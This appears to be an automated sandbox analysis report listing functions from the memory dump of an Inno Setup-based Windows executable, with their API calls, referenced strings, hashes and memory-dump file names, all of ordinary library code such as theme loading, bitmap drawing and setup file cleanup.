String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundExtent$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-1748089680
Opcode ID: dbed06f7595b1716ce2198f80e2773941165f955f4590fce6a33d3f90667ae1c
Instruction ID: 03dfae092b75d818a524d512a0b8bfda9bd8a64c44f972164b7d9b039d1d0e58
Opcode Fuzzy Hash: dbed06f7595b1716ce2198f80e2773941165f955f4590fce6a33d3f90667ae1c
Instruction Fuzzy Hash: 30A1A5B4A40B11AFDB04EFB5EC86E2A37A8EB19704B10197BB400DF296D77D9C04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004A4EC4, Relevance: 84.3, APIs: 1, Strings: 47, Instructions: 280libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A4E40: GetVersionExW.KERNEL32(00000114), ref: 004A4E5D

Part of subcall function 004A4E94: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A4EAC

LoadLibraryW.KERNEL32(00000000,00000000,004A52A5,?,?,00000000,00000000), ref: 004A4F24

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

GetThemeTextMetrics, xrefs: 004A4FC4
DrawThemeEdge, xrefs: 004A4FFA
IsAppThemed, xrefs: 004A51CE
EnableThemeDialogTexture, xrefs: 004A51F2
GetWindowTheme, xrefs: 004A51E0
DrawThemeText, xrefs: 004A4F6A
GetThemeFont, xrefs: 004A50C0
GetThemeSysString, xrefs: 004A5198
CloseThemeData, xrefs: 004A4F46
GetThemeMargins, xrefs: 004A50E4
GetThemeInt, xrefs: 004A508A
GetThemeSysBool, xrefs: 004A5162
GetThemeTextExtent, xrefs: 004A4FB2
GetThemeBackgroundContentRect, xrefs: 004A4F7C, 004A4F8E
GetThemeIntList, xrefs: 004A50F6
GetThemeSysInt, xrefs: 004A51AA
GetThemeSysColorBrush, xrefs: 004A5150
uxtheme.dll, xrefs: 004A4F11
GetThemeColor, xrefs: 004A5042
GetThemeAppProperties, xrefs: 004A5216
GetThemeEnumValue, xrefs: 004A509C
DrawThemeIcon, xrefs: 004A500C
DrawThemeBackground, xrefs: 004A4F58
GetThemePartSize, xrefs: 004A4FA0
GetThemeBool, xrefs: 004A5078
GetThemeSysColor, xrefs: 004A513E
HitTestThemeBackground, xrefs: 004A4FE8
GetThemeBackgroundRegion, xrefs: 004A4FD6
GetThemeDocumentationProperty, xrefs: 004A524C
IsThemePartDefined, xrefs: 004A501E
SetWindowTheme, xrefs: 004A511A
GetThemeRect, xrefs: 004A50D2
OpenThemeData, xrefs: 004A4F34
GetThemeFilename, xrefs: 004A512C
GetThemePropertyOrigin, xrefs: 004A5108
GetThemeSysFont, xrefs: 004A5186
IsThemeBackgroundPartiallyTransparent, xrefs: 004A5030
GetThemeSysSize, xrefs: 004A5174
IsThemeActive, xrefs: 004A51BC
SetThemeAppProperties, xrefs: 004A5228
GetCurrentThemeName, xrefs: 004A523A
EnableTheming, xrefs: 004A5270
GetThemeMetric, xrefs: 004A5054
GetThemeString, xrefs: 004A5066
GetThemePosition, xrefs: 004A50AE
DrawThemeParentBackground, xrefs: 004A525E
IsThemeDialogTextureEnabled, xrefs: 004A5204

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystemVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2754715182-2910565190
Opcode ID: 5a041caab29879ae59585b4871f3275c17d9cd7a66e2c4b0d18ed676b53e93cb
Instruction ID: 34710f8a37b5754a7619989322830bb577352d0a303a5992ba6e25e5a2d351dc
Opcode Fuzzy Hash: 5a041caab29879ae59585b4871f3275c17d9cd7a66e2c4b0d18ed676b53e93cb
Instruction Fuzzy Hash: C1A11474D40B11AFEB00EFA5D9C6A1E37A8EB26704B50197AB400DF296D77C9C04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004F7424, Relevance: 52.9, APIs: 14, Strings: 16, Instructions: 441sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,00000000,004F7935,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F746E
FindWindowW.USER32(00000000,00000000), ref: 004F749F

Strings

FREEDLL, xrefs: 004F7812
CALLDLLPROC, xrefs: 004F778B
SENDBROADCASTMESSAGE, xrefs: 004F7637
POSTMESSAGE, xrefs: 004F7549
SENDNOTIFYMESSAGE, xrefs: 004F75A3
SENDMESSAGE, xrefs: 004F74F3
CHARTOOEMBUFF, xrefs: 004F78C4
REGISTERWINDOWMESSAGE, xrefs: 004F75FD
OEMTOCHARBUFF, xrefs: 004F7877
CREATEMUTEX, xrefs: 004F7845
FINDWINDOWBYCLASSNAME, xrefs: 004F747B
FINDWINDOWBYWINDOWNAME, xrefs: 004F74B7
LOADDLL, xrefs: 004F7729
SLEEP, xrefs: 004F7458
SENDBROADCASTNOTIFYMESSAGE, xrefs: 004F76D7
POSTBROADCASTMESSAGE, xrefs: 004F7685

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: f05ff83abb72ccb9a11dffaa8805ec7d9c5df8855aeff6b200ff3066b11f6483
Instruction ID: 0e17e8d00172edbc6366e5fa95efb52a1bd71d66e725db954ccd643079299cbe
Opcode Fuzzy Hash: f05ff83abb72ccb9a11dffaa8805ec7d9c5df8855aeff6b200ff3066b11f6483
Instruction Fuzzy Hash: 0AC1D461B086085BCF00FA3E8C8692F5599AF98708720893FF545EB35BCE7CDD1A4759

Uniqueness

Uniqueness Score: -1.00%

Function 00415600, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00415609

Part of subcall function 004155D4: GetProcAddress.KERNEL32(00000000), ref: 004155ED

Strings

VarAdd, xrefs: 00415659
VarCmp, xrefs: 0041571F
VarMod, xrefs: 004156C7
VarIdiv, xrefs: 004156B1
VarDiv, xrefs: 0041569B
VarMul, xrefs: 00415685
VarR8FromStr, xrefs: 00415761
VarI4FromStr, xrefs: 00415735
VarBstrFromBool, xrefs: 004157E5
VarAnd, xrefs: 004156DD
VarBstrFromDate, xrefs: 004157CF
VarBstrFromCy, xrefs: 004157B9
VarCyFromStr, xrefs: 0041578D
VarNeg, xrefs: 0041562D
oleaut32.dll, xrefs: 00415604
VariantChangeTypeEx, xrefs: 00415617
VarDateFromStr, xrefs: 00415777
VarOr, xrefs: 004156F3
VarNot, xrefs: 00415643
VarR4FromStr, xrefs: 0041574B
VarXor, xrefs: 00415709
VarSub, xrefs: 0041566F
VarBoolFromStr, xrefs: 004157A3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: c70b7c8f3169a0024ad30cd2093238351d8f1b20c2dd28c5e1991e145273c34b
Instruction ID: 3f2c7d9c9272da408490c1f522796469700d87a1b7b73b98281ca9341e987c2f
Opcode Fuzzy Hash: c70b7c8f3169a0024ad30cd2093238351d8f1b20c2dd28c5e1991e145273c34b
Instruction Fuzzy Hash: 5E41FE72618B04FB93047B6EA8015DA7BDAD6C07143B4C02BB4048FA59DF7CA9D19B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00432AFC, Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00432B3F
SelectObject.GDI32(?,?), ref: 00432B54
MaskBlt.GDI32(?,?,?,?,?,?,00000000,00431C22,?,?,?,CCAA0029,00000000,00432BC4,?,?), ref: 00432B98
SelectObject.GDI32(?,?), ref: 00432BB2
DeleteObject.GDI32(?), ref: 00432BBE
CreateCompatibleDC.GDI32(00000000), ref: 00432BD2
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00432BF3
SelectObject.GDI32(?,?), ref: 00432C08
SelectPalette.GDI32(?,8308077E,00000000), ref: 00432C1C
SelectPalette.GDI32(?,?,00000000), ref: 00432C2E
SelectPalette.GDI32(?,00000000,000000FF), ref: 00432C43
SelectPalette.GDI32(?,8308077E,000000FF), ref: 00432C59
RealizePalette.GDI32(?), ref: 00432C65
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00432C87
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00431C22,?,?,00440328), ref: 00432CA9
SetTextColor.GDI32(?,00000000), ref: 00432CB1
SetBkColor.GDI32(?,00FFFFFF), ref: 00432CBF
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00432CEB
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00432D10
SetTextColor.GDI32(?,00431C22), ref: 00432D1A
SetBkColor.GDI32(?,00000000), ref: 00432D24
SelectObject.GDI32(?,00000000), ref: 00432D37
DeleteObject.GDI32(?), ref: 00432D40
SelectPalette.GDI32(?,00000000,00000000), ref: 00432D62
DeleteDC.GDI32(?), ref: 00432D6B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: a04f30a74c40dbf7e93a2f238fa9aa79fd4f271c7360f3957c125c04d716e3a9
Instruction ID: d034b4618e2972aea62039f1f7d2ad1cccad53cf4b3874f5b84d587d1a16ec0b
Opcode Fuzzy Hash: a04f30a74c40dbf7e93a2f238fa9aa79fd4f271c7360f3957c125c04d716e3a9
Instruction Fuzzy Hash: 438193B1A00249AFDB50DEA9CD85FAF77FCAB0C714F110559F618F7292C678AD008B69

Uniqueness

Uniqueness Score: -1.00%

Function 00434B10, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000000,00000054,?,00000000,?,?), ref: 00434B33
GetDC.USER32(00000000), ref: 00434B61
CreateCompatibleDC.GDI32(?), ref: 00434B72
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00434B8D
SelectObject.GDI32(?,00000000), ref: 00434BA7
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00434BC9
CreateCompatibleDC.GDI32(?), ref: 00434BD7
SelectObject.GDI32(00000000,00000000), ref: 00434C1F
SelectPalette.GDI32(00000000,?,00000000), ref: 00434C32
RealizePalette.GDI32(00000000), ref: 00434C3B
SelectPalette.GDI32(?,?,00000000), ref: 00434C47
RealizePalette.GDI32(?), ref: 00434C50
SetBkColor.GDI32(00000000,00000000), ref: 00434C5A
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00434C7E
SetBkColor.GDI32(00000000,00000000), ref: 00434C88
SelectObject.GDI32(00000000,00000000), ref: 00434C9B
DeleteObject.GDI32(00000000), ref: 00434CA7
DeleteDC.GDI32(00000000), ref: 00434CBD
SelectObject.GDI32(?,00000000), ref: 00434CD8
DeleteDC.GDI32(00000000), ref: 00434CF4
ReleaseDC.USER32 ref: 00434D05

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: c3fbc05cf5805c8685c1b67128c962a0d125028280f5df3cea1153d378d76d2c
Instruction ID: 453225a8cb8d6c2ada6f79124b4d1807b40c4de9b1724858bfa0f1eafd7650ad
Opcode Fuzzy Hash: c3fbc05cf5805c8685c1b67128c962a0d125028280f5df3cea1153d378d76d2c
Instruction Fuzzy Hash: 8B51EDB1E00244ABDB10DAE9CC55FAFB7FCAB4C704F11546AB614E7292D678AD408B68

Uniqueness

Uniqueness Score: -1.00%

Function 004E4810, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000001,000000FF), ref: 004E48C1
MulDiv.KERNEL32(?,00000000,000000FF), ref: 004E48D5
SetBkMode.GDI32(00000000,00000001), ref: 004E4945
InflateRect.USER32(?,000000F8,000000F8), ref: 004E49CA

Part of subcall function 00431E8C: FillRect.USER32 ref: 00431EB5

OffsetRect.USER32(?,000000FC,00000004), ref: 004E49EE
DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4A26
DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4A52
InflateRect.USER32(?,000000FA,000000FA), ref: 004E4A96
DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4ACA
OffsetRect.USER32(?,000000FF,00000001), ref: 004E4AFC
OffsetRect.USER32(?,00000001,00000001), ref: 004E4B0B
DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4B34
DrawTextW.USER32(00000000,00000000,000000FF,?,00000910), ref: 004E4B60

Strings

Arial, xrefs: 004E495E, 004E4A5A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$DrawText$Offset$Inflate$FillMode
String ID: Arial
API String ID: 1959622563-493054409
Opcode ID: d735ea529883af6ce3cfb4c08bc24487b3c151a2384c3cd71f66bb95d529f725
Instruction ID: 1839ce3238db755f5e25d90a8a5ddf41b9dd97ccd3b0d9e3e4936e6c5cca9181
Opcode Fuzzy Hash: d735ea529883af6ce3cfb4c08bc24487b3c151a2384c3cd71f66bb95d529f725
Instruction Fuzzy Hash: 0DA18671A00155ABDB00EFAADC81E9EB3A9AF49314F10462AF515F72D2CB78AD05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00435ECC, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 352windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043613C
CreateCompatibleDC.GDI32(00000001), ref: 004361A1
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004361B6
SelectObject.GDI32(?,00000000), ref: 004361C0
SelectPalette.GDI32(?,?,00000000), ref: 004361F0
RealizePalette.GDI32(?), ref: 004361FC
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00436220
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00436279,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0043622E
SelectPalette.GDI32(?,00000000,000000FF), ref: 00436260
SelectObject.GDI32(?,?), ref: 0043626D
DeleteObject.GDI32(00000000), ref: 00436273

Strings

(, xrefs: 00436087
BM, xrefs: 00435FF2

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 9986afa8ea7f606e4d60f232d2bccb231128b627306d268a3973eaa9e3b6380a
Instruction ID: eff55196e3ae19b50b87c52a8b78c27d512031dc7caedbe13f64567dd075d7fd
Opcode Fuzzy Hash: 9986afa8ea7f606e4d60f232d2bccb231128b627306d268a3973eaa9e3b6380a
Instruction Fuzzy Hash: 5CD15E70A00219AFDF14DFA9C885AAEBBF5EF4D304F11906AE900A7395D7389D40CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004FE294, Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 268COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,004FE668,?,?,00000000,?,00000000,00000000,?,004FEB16,00000000,004FEB20,?,00000000), ref: 004FE31B
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?,00000000,00000000), ref: 004FE341
MsgWaitForMultipleObjects.USER32 ref: 004FE362
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?,00000000), ref: 004FE377

Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1

Strings

/REGU, xrefs: 004FE2EE
.lst, xrefs: 004FE3B4
/REG, xrefs: 004FE2CA
.msg, xrefs: 004FE39A
Inno-Setup-RegSvr-Mutex, xrefs: 004FE325
Setup, xrefs: 004FE306

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$FileModuleMultipleNameObjectsWait
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 66301061-3672972446
Opcode ID: 1d231b12cb4f059ae3176aa7ae29ebe17382b69eee0979cf9471fc9a4a9a4f27
Instruction ID: 3eb728371c213ff15b7bf5068121ca3ff1519d47c4d722a15f1148c1838efd6d
Opcode Fuzzy Hash: 1d231b12cb4f059ae3176aa7ae29ebe17382b69eee0979cf9471fc9a4a9a4f27
Instruction Fuzzy Hash: 9A91D430A042089FDB10EBA6C851BBE77F4EB09709F51446AFA00EB7A2D77D9D05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004B6018, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 214COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004B62D8,?,?,?,?,00000005,00000000,00000000,?,?,004B76B1,00000000,00000000,?,00000000), ref: 004B618C

Strings

.gid, xrefs: 004B606E
.lnk, xrefs: 004B60F9
The file appears to be in use (%d). Will delete on restart., xrefs: 004B61D5
.hlp, xrefs: 004B6055
.fts, xrefs: 004B6092
Failed to strip read-only attribute., xrefs: 004B6171
Deleting file: %s, xrefs: 004B612B
.chm, xrefs: 004B60BA
Stripped read-only attribute., xrefs: 004B6165
Failed to delete the file; it may be in use (%d)., xrefs: 004B626F
.chw, xrefs: 004B60D3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: 6d7d755d0a881a4da949cd7523fd5a3d8d28aaa62fda90a5a103dbba78f74fe0
Instruction ID: 7ed9f04ec13f5c3f5660eb524a497fab973c0e9aa021cbf78e872c09f34b2f30
Opcode Fuzzy Hash: 6d7d755d0a881a4da949cd7523fd5a3d8d28aaa62fda90a5a103dbba78f74fe0
Instruction Fuzzy Hash: 57719130B042445BEB15EB6E88427EE77A99F49708F52856BF801AB382CB7CDD05877D

Uniqueness

Uniqueness Score: -1.00%

